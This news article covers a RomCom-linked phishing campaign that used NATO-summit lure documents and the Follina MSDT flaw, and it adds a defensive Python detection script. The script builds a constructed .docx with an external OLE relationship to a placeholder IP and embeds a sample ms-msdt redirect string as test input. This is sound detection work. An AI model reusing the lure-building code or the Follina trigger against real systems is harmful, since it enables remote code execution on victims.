The threat actor behind the RomCom RAT is suspected of carrying out targeted phishing attacks ahead of the upcoming NATO summit in Vilnius, as well as against organizations identified as supporting Ukraine abroad.
The findings come from BlackBerry’s Threat Intelligence and Research team, who found two malicious documents sent from a Hungarian IP address on July 4, 2023.
RomCom, also tracked under the names Tropical Scorpius, UNC2596, and Void Rabisu, was recently observed carrying out cyberattacks against politicians in Ukraine who cooperate with Western countries, and against US-based healthcare organizations involved in helping refugees fleeing the war-torn country.
The group's attacks are geopolitically motivated and have relied on spear-phishing emails that steer victims to cloned websites hosting trojanized versions of popular software. Past targets include the military, food supply chains and IT companies.
The two lure documents identified by BlackBerry masquerade as material from the Ukrainian World Congress (UWC), a legitimate non-profit organization (“Overview_of_UWCs_UkraineInNATO_campaign.docx”), and as a letter expressing support for Ukraine’s entry into NATO (“Letter_NATO_Summit_Vilnius_2023_ENG(1).docx”).
“While we have not found the initial infection vector, threat actors likely relied on spear-phishing techniques, engaging their victims to click on a specially crafted replica of the Ukraine World Congress website,” the Canadian company said in an analysis published last week.
Opening the file triggers an execution sequence in which the document fetches an intermediate payload from a remote server; that payload, in turn, exploits Follina (CVE-2022-30190), a now-patched flaw in the Microsoft Support Diagnostic Tool (MSDT), to achieve remote code execution.
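The chain described above leaves two artifacts a defender can check for without detonating the document: an OOXML relationship that points to an external HTTP(S) target (the mechanism by which a .docx pulls a remote payload), and an `ms-msdt:` URI in whatever that remote stage returns (the Follina trigger). The script below is an added example for this article, not code from BlackBerry or from the campaign; it builds a constructed in-memory .docx with such a relationship, the `203.0.113.10` address and the HTML stage are placeholders, and the MSDT parameters in the sample are constructed rather than copied from any real payload.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
ATTACHED_TEMPLATE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
HYPERLINK_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
# Relationship types Office will resolve automatically on open; an external
# target of one of these types is the tell-tale of a remote-template/Follina lure.
SUSPICIOUS_REL_TYPES = {OLE_REL, ATTACHED_TEMPLATE_REL}

# Constructed stand-in for a remote HTML stage; the ms-msdt parameters are made up.
SAMPLE_HTML_STAGE = (
    "<html><body><script>"
    "window.location.href = \"ms-msdt:/id PCWDiagnostic /skip force /param IT_BrowseForFile=stage2.txt\";"
    "</script></body></html>"
)


def build_sample_docx(external_target=None):
    """Build a minimal constructed .docx in memory.

    Every sample carries a benign external hyperlink; if external_target is given,
    an oleObject relationship pointing at it is added as well (the Follina pattern).
    """
    rels = [
        f'<Relationship Id="rId1" Type="{HYPERLINK_REL}" '
        f'Target="https://example.org/" TargetMode="External"/>'
    ]
    if external_target:
        rels.append(
            f'<Relationship Id="rId2" Type="{OLE_REL}" '
            f'Target="{external_target}" TargetMode="External"/>'
        )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">' + "".join(rels) + "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                   "<w:body/></w:document>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def find_external_targets(docx_bytes):
    """Return every external HTTP(S) relationship in any .rels part of the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") != "External":
                    continue
                if not re.match(r"(?i)https?://", target):
                    continue
                rel_type = rel.get("Type", "")
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rel_type,
                    "target": target,
                    # a plain hyperlink needs a click; OLE/template targets load on open
                    "suspicious": rel_type in SUSPICIOUS_REL_TYPES,
                })
    return findings


def find_msdt_uris(text):
    """Return every ms-msdt: URI found in a fetched stage (HTML, RTF, JS)."""
    return re.findall(r"(?i)ms-msdt:[^\"'<>]*", text)


if __name__ == "__main__":
    sample = build_sample_docx("http://203.0.113.10/word.html!")
    for hit in find_external_targets(sample):
        print(hit)
    print(find_msdt_uris(SAMPLE_HTML_STAGE))
```

Run it against a directory of mail attachments and alert on any hit with `suspicious` set; hyperlinks are listed too so an analyst can see them, but only relationship types Word resolves without user interaction warrant blocking on their own. The trailing `!` on the constructed OLE target mirrors a quirk Office tolerates in such URLs and is kept here so the regex is exercised on it.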
The end result is the deployment of the RomCom RAT, a C++ executable designed to collect information about the compromised system and exfiltrate it to a remote server.
“Based on the upcoming NATO summit and related bogus documents sent by threat actors, the intended victims are representatives of Ukraine, foreign organizations and individuals supporting Ukraine,” BlackBerry said.
“Based on available information, we have moderate to high confidence to conclude that this is a renamed RomCom operation, or that one or more members of the RomCom threat group are behind this new campaign supporting the new threat group.”